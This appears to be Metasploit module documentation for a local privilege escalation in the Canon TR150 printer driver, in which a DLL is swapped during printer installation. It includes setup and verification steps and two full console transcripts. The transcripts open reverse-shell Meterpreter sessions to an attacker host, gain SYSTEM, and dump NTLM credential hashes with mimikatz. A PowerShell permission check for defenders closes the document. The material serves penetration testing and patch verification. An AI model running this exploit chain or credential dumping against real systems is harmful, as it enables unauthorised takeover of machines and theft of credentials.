## Vulnerable Application

Canon TR150 printer driver versions 3.71.2.10 and below allow local users to read and write files within the `CanonBJ` directory and its subdirectories. By overwriting the DLL at `C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C\CNMurGE.dll` with a malicious DLL at the right moment while the `C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs` script is installing a new printer, a race condition can be exploited to make `PrintIsolationHost.exe`, which runs as `NT AUTHORITY\SYSTEM`, load the malicious DLL. Successful exploitation grants the attacker code execution as `NT AUTHORITY\SYSTEM`.

This module leverages the `prnmngr.vbs` script to add and delete printers. Because success depends on winning the race, multiple runs of this module may be required; the second scenario below shows a first attempt that completes without a session and a second attempt that succeeds.

## Installation Instructions

1. Download the driver installer from https://pdisp01.c-wss.com/gdl/WWUFORedirectTarget.do?id=MDEwMDAxMDY5OTAx&cmp=ABR&lang=EN
1. Run the downloaded EXE as an administrator and wait for the installation to finish.
1. Go to `Add a New Printer or Scanner`, then select `The printer that I want isn't listed`. You may need to hit the refresh button for this to show up.
1. Select `Add a printer using a TCP/IP address or hostname` and click `Next`.
1. Under `Device Type` select `TCP/IP device`, and enter an IP address that is not in use on the network.
1. Uncheck `Query the printer and automatically select the driver to use` and click `Next`.
1. Wait until you are prompted for additional port information, then select `Standard` under `Device Type` and choose `Canon Network Printer`.
1. On the next screen select `Canon TR150 Series` and click `Next`.
1. Select `Use the driver that is currently installed (recommended)` and click `Next`.
1. Accept the default printer name and click `Next`; the printer should be installed.

## Verification Steps

1. Install a vulnerable Canon TR150 driver using the steps from `Installation Instructions`
2. Start `msfconsole`
3. Get a session as a low-privileged user
4. Do: `use exploit/windows/local/canon_driver_privesc`
5. Do: `set SESSION ` (the ID of the session from step 3)
6. Do: `run`
7. You should get a new session running as `NT AUTHORITY\SYSTEM`

## Options

This module has no options beyond the standard `SESSION` (see the `show options` output in the second scenario).

## Scenarios

### Canon TR150 series v3.71.2.10 on Windows 10 Build 17134

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(multi/handler) > set lport 1270
lport => 1270
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.0.0.8:1270
[*] Sending stage (200262 bytes) to 10.0.0.7
[*] Meterpreter session 1 opened (10.0.0.8:1270 -> 10.0.0.7:49816) at 2021-08-05 11:14:25 -0400

meterpreter > getuid
Server username: MOURNLAND\lowlevel
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set lhost 10.0.0.8
lhost => 10.0.0.8
msf6 exploit(windows/local/canon_driver_privesc) > set session 1
session => 1
msf6 exploit(windows/local/canon_driver_privesc) > run

[*] Started reverse TCP handler on 10.0.0.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat
[*] Adding printer ePzTcgz...
[*] Sending stage (200262 bytes) to 10.0.0.7
[+] Deleted C:\Users\lowlevel\AppData\Local\Temp\YoBndh.bat
[+] Deleted C:\Users\lowlevel\AppData\Local\Temp\CNMurGE.dll
[*] Meterpreter session 2 opened (10.0.0.8:4444 -> 10.0.0.7:49819) at 2021-08-05 11:15:31 -0400
[*] Deleting printer ePzTcgz

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : MOURNLAND
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > quit
[*] Shutting down Meterpreter...
```

### TR150 series Printer Driver Ver.1.00 On Windows 10 20H2

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp
PAYLOAD => windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set RHOST 192.168.224.211
RHOST => 192.168.224.211
msf6 exploit(multi/handler) > exploit

[*] Started bind TCP handler against 192.168.224.211:4444
[*] Sending stage (200262 bytes) to 192.168.224.211
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.224.211:4444) at 2021-08-09 14:11:47 -0500

meterpreter > getuid
Server username: DESKTOP-DIK4B96\test
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/canon_driver_privesc
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/canon_driver_privesc) > show options

Module options (exploit/windows/local/canon_driver_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/canon_driver_privesc) > set LPORT 8877
LPORT => 8877
msf6 exploit(windows/local/canon_driver_privesc) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/canon_driver_privesc) > show options

Module options (exploit/windows/local/canon_driver_privesc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.224.128  yes       The listen address (an interface may be specified)
   LPORT     8877             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows


msf6 exploit(windows/local/canon_driver_privesc) > exploit

[*] Started reverse TCP handler on 192.168.224.128:8877
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\test\AppData\Local\Temp\ssSffWM.bat
[*] Writing DLL file to C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Adding printer SFywU...
[*] Deleting printer SFywU
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/canon_driver_privesc) > exploit

[*] Started reverse TCP handler on 192.168.224.128:8877
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Canon language driver directory grants Users full permissions
[*] Dropping batch script to C:\Users\test\AppData\Local\Temp\dsrlKmQ.bat
[*] Writing DLL file to C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Adding printer HRudL...
[*] Sending stage (200262 bytes) to 192.168.224.211
[+] Deleted C:\Users\test\AppData\Local\Temp\dsrlKmQ.bat
[+] Deleted C:\Users\test\AppData\Local\Temp\CNMurGE.dll
[*] Meterpreter session 2 opened (192.168.224.128:8877 -> 192.168.224.211:61310) at 2021-08-09 14:13:12 -0500
[*] Deleting printer HRudL

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-DIK4B96
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeChangeNotifyPrivilege
SeImpersonatePrivilege
SeTcbPrivilege

meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain           NTLM                              SHA1
--------  ------           ----                              ----
test      DESKTOP-DIK4B96  0cb6948805f797bf2a82807973b89537  87f8ed9157125ffc4da9e06a7b8011ad80a53fe1

wdigest credentials
===================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
DESKTOP-DIK4B96$  WORKGROUP        (null)
test              DESKTOP-DIK4B96  (null)

kerberos credentials
====================

Username          Domain           Password
--------          ------           --------
(null)            (null)           (null)
desktop-dik4b96$  WORKGROUP        (null)
test              DESKTOP-DIK4B96  (null)

meterpreter >
```
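The module's automatic check (the `Canon language driver directory grants Users full permissions` line in both transcripts) can be reproduced by hand before running the exploit, or run across a fleet to find hosts whose driver still needs attention. The PowerShell below is an added example, not code from the Metasploit module or from Canon: it reads the DACL of the `LanguageModules\040C` directory and of `CNMurGE.dll` named in the description and reports any Allow entry that gives a low-privileged principal the right to create, delete or overwrite files or to change permissions. The set of principals treated as low-privileged and the `Get-LowPrivWriteAce` helper are this example's own assumptions; the module itself only reports on `Users`.

```powershell
# Added example (not part of the Metasploit module or the Canon driver):
# reproduce the module's ACL check by hand from a low-privileged session.
# Paths are the ones named in the module description; the principal list is
# this example's assumption about what "any local user" resolves to.
$LanguageModulesDir = 'C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C'
$TargetDll          = Join-Path $LanguageModulesDir 'CNMurGE.dll'

# Groups every interactive local user belongs to; an Allow ACE for any of
# them is reachable from an unprivileged session.
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'Everyone',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that let the caller create, delete or overwrite files here. The named
# FileSystemRights members cover explicit ACEs; GENERIC_ALL (0x10000000) and
# GENERIC_WRITE (0x40000000) cover inherit-only ACEs, which Get-Acl reports
# as a raw number rather than a member name.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::DeleteSubdirectoriesAndFiles -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership)
$WriteMask = $WriteMask -bor 0x10000000 -bor 0x40000000

# Emit one object per Allow ACE that grants a low-privileged principal any
# bit of $WriteMask on $Path. Returns nothing when the DACL is tight.
function Get-LowPrivWriteAce {
    param([Parameter(Mandatory)][string]$Path)

    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
        [pscustomobject]@{
            Path      = $Path
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

# Check the directory (file creation / deletion) and the DLL itself (in-place
# overwrite); either one being writable is enough to swap the DLL.
foreach ($p in @($LanguageModulesDir, $TargetDll)) {
    if (-not (Test-Path -LiteralPath $p)) {
        Write-Warning "$p not found; the TR150 driver (or this language module) is not installed."
        continue
    }
    $hits = @(Get-LowPrivWriteAce -Path $p)
    if ($hits.Count -gt 0) {
        Write-Host "[!] $p is writable by a low-privileged principal:"
        $hits | Format-Table Principal, Rights, Inherited -AutoSize | Out-Host
    } else {
        Write-Host "[+] $p grants no write rights to low-privileged principals."
    }
}
```

Run it from the low-privileged user's session, as the module does. Check the directory as well as the DLL: `WriteData` together with `DeleteSubdirectoriesAndFiles` on the directory lets the file be removed and recreated whatever the file's own ACL says, which is why the module looks at the directory. A clean result only shows that the DACL has been tightened on this host; the description treats driver versions 3.71.2.10 and below as affected, so a tightened ACL on one of those versions is a stopgap rather than a fix.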